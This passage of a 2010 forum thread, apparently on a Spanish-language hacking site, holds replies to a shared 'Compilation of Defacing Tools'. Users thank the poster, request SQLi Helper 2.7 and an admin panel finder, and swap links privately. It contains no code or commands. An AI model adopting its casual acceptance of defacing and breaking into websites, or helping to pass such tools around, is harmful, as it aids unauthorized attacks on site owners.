Posted: 23 Mar 2010, 22:12
by niller
Thanks Skillmax, I was just looking for a panel finder.
Regards ..

Re: Compilation of Defacing Tools.

Posted: 24 Mar 2010, 13:33
by Fantasma17
Could someone analyze SQLi Helper 2.7 and check that it is completely clean? It's a hacking tool, but still ...

Re: Compilation of Defacing Tools.

Posted: 25 Mar 2010, 17:36
by NeKo
Skill, note that the Perl download is broken.

Re: Compilation of Defacing Tools.

Posted: 25 Mar 2010, 20:46
by Fantasma17
[External link removed for guests] it's here too.

Re: Compilation of Defacing Tools.

Posted: 01 Apr 2010, 06:47
by mgs_solidsnake
very good tools, they never hurt xD thanks friends

Re: Compilation of Defacing Tools.

Posted: 03 Apr 2010, 01:15
by DARK_J4V13R
I'm taking the Panel Finder

Very good compilation Skill

Regards

Re: Compilation of Defacing Tools.

Posted: 03 Apr 2010, 12:31
by p0is0n-123
The PanelFinder is very useful, but with the panel alone you can't do anything....
They usually have the logins and passwords encrypted...
Thanks SkillmaX

Regards

Re: Compilation of Defacing Tools.

Posted: 18 Jun 2010, 10:10
by Ortek
Please, can someone upload SQLi Helper 2.7


Regards

Re: Compilation of Defacing Tools.

Posted: 18 Jun 2010, 11:25
by falkoner
wow! thank you very much skillmax (I got emotional) xd.

Re: Compilation of Defacing Tools.

Posted: 18 Jun 2010, 12:59
by Skillmax
falkoner wrote: wow! thank you very much skillmax (I got emotional) xd.

You're welcome friend, regards to you.



Re: Compilation of Defacing Tools.

Posted: 19 Jun 2010, 14:48
by R-007
I see a lot of effort in your contributions XD
regards!

Re: Compilation of Defacing Tools.

Posted: 19 Jun 2010, 16:19
by Skillmax
Thanks friends; Ortek, I already sent you the SQLi Helper link over MSN.



Regards friends!